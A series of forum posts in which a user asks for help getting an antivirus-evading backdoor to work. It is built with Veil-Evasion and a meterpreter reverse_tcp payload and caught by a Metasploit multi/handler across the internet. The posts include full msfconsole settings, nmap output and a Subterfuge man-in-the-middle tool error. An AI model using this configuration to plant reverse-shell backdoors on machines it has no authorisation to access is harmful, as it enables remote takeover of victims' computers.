Posts posted by Caps
-
Hello,
I can't make a backdoor that works with a DNS. I want to use Veil to bypass the AV but it does not work.
What I use in Veil:
- I use python/shellcode_inject/base64_substitution
- For payload windows/meterpreter/reverse_tcp_dns
Veil asks me 2 times for a lhost.
What I use in Metasploit:
- multi/handler
- payload is windows/meterpreter/reverse_tcp_dns
- lhost is my local ip
- lport is my port
It works without a DNS.
Please help.
-
Yes, I use reverse TCP, and it works when I use an online scanner, so I have to check on my backdoor.
-
Nice, now it's working over LAN. I want to try it over the internet; still the same problem.
For the configs of my backdoor and listener see above, it is still the same, but I will recap it:
Backdoor
lhost: my external ip
lport: 4444
Listener
lhost: my internal ip
lport: 4444
The port is open on my router, checked with an online checker.
-
Thanks for the help, it works now!
-
So I did some nc and my listener is working: when I do a nc on my PC on my listener I get "sending stage". How do I test it from my Windows PC?
I think that my PC blocks connections from outside.
EDIT:
I installed netcat on my Windows; when I try to do it I don't get any connections.
-
There are no sessions when I try to connect, and when I do jobs there is a job multi/handler.
I am trying to fix my problem that I can use my backdoor over LAN. Any ideas?
-
So I think I got the port forward to work but I can't get a session. Even when I try just a local backdoor with the lhost on the backdoor set to my local ip, it will not work.
-
Well, all I can tell you, based on your screenshot, is that with this configuration in place, if something on the internet wants to connect to you on port 4444, that will now work.
If you have a backdoor on a remote machine, you probably only need to connect to it as it's listening on a port for you - this whole port mapping thing shouldn't even be required. Unless, in the process of breaking into a remote host you run shellcode on the remote host that results in it connecting back to you.
That really is all I can tell you. To make it a car analogy, you're asking me if a close-up photograph of a chunk of asphalt is a part of the road between New York and Las Vegas. It could be, but without a bit more info it's impossible to tell.
OK, I will try to give you as much info as I can.
I run Kali Linux 2 on my laptop, a ThinkPad Edge; it is not a VM.
I am wirelessly connected to my router, a bbox 3.
Here are my commands for my terminal listener:
root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
[-] WARNING! The following modules could not be loaded!
[-] /usr/share/metasploit-framework/modules/exploits/windows/25912.rb: SyntaxError /usr/share/metasploit-framework/modules/exploits/windows/25912.rb:30: syntax error, unexpected tCONSTANT, expecting end-of-input
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
^
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *
Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.4-2015071403 ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.44
lhost => 192.168.1.44
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.44     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.44:4444
[*] Starting the payload handler...
msf exploit(handler) >
I use veil-evasion for my backdoor.
The encoder I use:
35) python/shellcode_inject/base64_substitution
Shellcode is msfvenom, payload is windows/meterpreter/reverse_tcp
LHOST: my external ip
LPORT: 4444
no extra msfvenom options
That's my backdoor.
I also did some nmaps:
on my local ip:
root@kali:~# nmap 192.168.1.44 -p 4444
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 12:58 BST
Nmap scan report for kali (192.168.1.44)
Host is up (0.00013s latency).
PORT STATE SERVICE
4444/tcp open krb524
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
on my router gateway:
root@kali:~# nmap 192.168.1.1 -p 4444
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 12:59 BST
Nmap scan report for mymodem (192.168.1.1)
Host is up (0.0032s latency).
PORT STATE SERVICE
4444/tcp closed krb524
MAC Address: 68:15:90:0C:2E:01 (Sagemcom SAS)
Nmap done: 1 IP address (1 host up) scanned in 0.64 seconds
and on my public ip:
root@kali:~# nmap public ip -p 4444
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 13:00 BST
Nmap scan report for x.x.x.x.belgacom.be (public ip)
Host is up (0.0065s latency).
PORT STATE SERVICE
4444/tcp filtered krb524
Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds
Here is my ifconfig on wlan:
root@kali:~# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 74:e5:0b:0b:f6:a4
inet addr:192.168.1.44 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: 2a02:a03f:2c0a:e400:76e5:bff:fe0b:f6a4/64 Scope:Global
inet6 addr: fe80::76e5:bff:fe0b:f6a4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:617656 errors:0 dropped:0 overruns:0 frame:0
TX packets:283680 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:546610500 (521.2 MiB) TX bytes:43580129 (41.5 MiB)
I think I gave you all I can. It says that I can't post until tomorrow.
-
Please help me, I am still here.
-
Hello, I am new to this forum but I think you guys can help me.
I am having trouble with Metasploit over the internet.
I have a backdoor with lhost: external ip and lport: 4444
My listener is just multi/handler with lhost: local ip and lport: 4444
I port forwarded the port 4444 on my router to my local ip. To make my backdoor I use Veil.
Hope you can help me!!!
Kali Linux 2.0: Need help with subterfuge
in Hacks & Mods
Hello,
I want to use subterfuge but I am getting an error, please help me:
Traceback (most recent call last):
  File "/bin/subterfuge", line 7, in <module>
    from update import updatecheck
  File "/usr/share/subterfuge/update.py", line 24, in <module>
    for settings in setup.objects.all():
  File "/usr/lib/python2.7/dist-packages/django/db/models/query.py", line 141, in __iter__
    self._fetch_all()
  File "/usr/lib/python2.7/dist-packages/django/db/models/query.py", line 966, in _fetch_all
    self._result_cache = list(self.iterator())
  File "/usr/lib/python2.7/dist-packages/django/db/models/query.py", line 265, in iterator
    for row in compiler.results_iter():
  File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 700, in results_iter
    for rows in self.execute_sql(MULTI):
  File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 775, in execute_sql
    sql, params = self.as_sql()
  File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 100, in as_sql
    out_cols, s_params = self.get_columns(with_col_aliases)
  File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 246, in get_columns
    col_aliases)
  File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 328, in get_default_columns
    r = '%s.%s' % (qn(alias), qn2(column))
  File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 62, in __call__
    r = self.connection.ops.quote_name(name)
  File "/usr/lib/python2.7/dist-packages/django/db/backends/dummy/base.py", line 18, in complain
    raise ImproperlyConfigured("settings.DATABASES is improperly configured. "
django.core.exceptions.ImproperlyConfigured: settings.DATABASES is improperly configured. Please supply the ENGINE value. Check settings documentation for more details.
I followed the instructions on the git site: https://github.com/Subterfuge-Framework/Subterfuge
Please send help, Caps....